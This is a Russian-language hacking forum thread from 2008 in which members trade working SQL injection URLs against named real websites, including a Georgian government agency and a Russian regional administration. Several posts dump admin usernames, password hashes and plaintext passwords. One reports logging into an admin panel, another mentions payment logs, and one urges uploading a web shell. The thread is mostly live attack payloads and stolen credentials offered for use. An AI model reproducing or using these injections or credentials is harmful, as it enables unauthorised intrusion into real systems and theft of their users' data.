SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Не выводит на полях http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
    version()

    Что делать?
     
    1 person likes this.
  2. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Я сам с осетии а сайт этот моей фирмы где я работаю моя задача найти дыру и покозать её! Я её нашел но вот возникает вопрос! Почему не выводит
    http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*

    version()???
     
    1 person likes this.
  3. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.maxivetlanda.se/view_2008.php?katid=-1+union+select+concat(0x3a3a,loginnamn,0x3a3a,losenord,0x3a3a)+from+anv+limit+0,1/*

    login: super password: duper

    http://www.maxivetlanda.se/admin
     
    1 person likes this.
  4. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    http://15rus.ru/txt.php?cat=-3+union+select+0,VERSION(),2,3,4,5,6,7,8/*
     
    7 people like this.
  5. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Имха... тебе таблы нужны =\

    (Зацени какой красивый вывод ;) )

    Я бы на твоём месте заинтересовался этой:

    Залить шеллтеперь дело техники... кибби круто описал всё... дерзай ;)
     
    1 person likes this.
  6. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Нашёл админа имя и пороль:

    Mihael:3fde6bb0541387e4ebdadf7c2ff31123

    пороль: 1q2w3e
    Не заходит почему?
    http://15rus.ru//forum/index.php
     
  7. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Эмм, там таблиц с юзерами пхпбб форума аж 3 -
    http://15rus.ru/txt.php?cat=-3+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.columns+where+column_name=0x757365726E616D65/*
    Тебе нужна не phpbb_users, а phpbb2_users, ибо у мну ща выпала ошибка -
    phpBB : Critical Error

    Error obtaining user details

    DEBUG MODE

    SELECT * FROM phpbb2_users WHERE user_id = -1

    =/

    Правильный запрос выглядит так -
    http://15rus.ru/txt.php?cat=-3+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9+from+u19256.phpbb2_users+where+user_level=1/*
    Это 4 админа форума, теперь расшифровывай хэши
     
    #6427 0nep@t0p, 28 Aug 2008
    Last edited: 28 Aug 2008
    3 people like this.
  8. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    грузинский сайтег The So cial Subsi dy Agency

    http://www.ssa.gov.ge

    Code:
    http://www.ssa.gov.ge/index.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    version() - 4.0.27
    user() - ssa_gov_ge@localhost
    database() - ssa_gov_ge

    Пробовал получить доступ к mysql.user , но его нету.
     
  9. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А подскажите плиз как увидеть поле...

    ....pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,column_name)%20from%20information_schema.columns+limit+237,1--

    Этим запросом мы видим Table and Column в БД information_schema как сделать так чтоб было видно поле в колонке?
     
  10. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    вот так
     
  11. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    видимо немного не так меня понели или это я не понимаю так как 1 раз инъекцию провожу

    У меня есть БД information_schema в ней есть в ней есть таблица user_list в этой таблице есть поля такие как pass и login и мне нужно посмотреть значение этих полей.

    С помощью этого запроса я вижу таблицу и колонку user_list::pass

     
  12. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    я же вроде написал как...
    только пробел удали в user_list
     
  13. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Кароче вот запрос на таблицу с полем пасс

     
  14. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    в общем то вот лог платежей их..
    весьма не мало платежей... дальше ковырять впадлу, пойду спать..
     
    #6434 gisTy, 28 Aug 2008
    Last edited: 28 Aug 2008
  15. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    БД

    (перебирать limit+0т 0,1 до 37,1

    http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,table_name,6+from+INFORMATION_SCHEMA.tables+limit+0,1--

    Верися: 5.0.67-log
    http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,version(),6--

    БД system

    http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,column_name,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x73797374656d--

    0x73797374656d = system так как идет фильтрация =)


    :)
     
    1 person likes this.
  16. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    avo.ru - Администрация Владимирской области
    Взлом через сайт admgor.avo.ru
    Code:
    http://admgor.avo.ru/mun_zak/mun_zak.php?type=2&state_id=-1+union+select+concat_ws(0x3a,username,email,password,usertype),2,3,4,5+from+aleksandrov.jos_users+limit+0,1/*
    login : admin
    password : zxcvbnm098
    статус : Super Administrator

    Полазил по админке http://avo.ru/administrator/ - и халяву сразу прикрыли :(
     
    3 people like this.
  17. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://www.avi-trucks.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
     
  18. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    1) _http://www.info.gomel.by/news.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),DATABASE()),6,7,8,9,10,11,12/*

    2) _http://www.wemarketu.com/news.php?id=-12+union+select+1,2,concat_ws(0x3a,user(),version(),DATABASE()),4/*

    Юзер:Версия БД: БД :)
     
    #6438 SeNaP, 28 Aug 2008
    Last edited: 28 Aug 2008
    2 people like this.
  19. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    ЮЗЕР ВЕРСИЯ-БД БАЗА ДАННЫХ
    http://djexx.com/news.php?id=-12+union+select+1,concat_ws(0x3a,user(),version(),DATABASE()),3,4,5,6,7,8,9,10--

    БАЗЫ данных ( перебирать limit'ом от 0,1 до 28,1)
    http://djexx.com/news.php?id=-12+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+1,1--

    там не чего интересного нет :( кто найдет что побольше, выкладывайте :)
     
  20. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    ЮЗЕР ВЕРСИЯ БАЗА ДАННЫХ
    http://www.etc-nepal.org/news.php?id=-12+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6/*
    http://teamhardcorepavement.com/news.php?id=-12+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7/*
     
    #6440 SeNaP, 28 Aug 2008
    Last edited: 28 Aug 2008
    1 person likes this.
Thread Status:
Not open for further replies.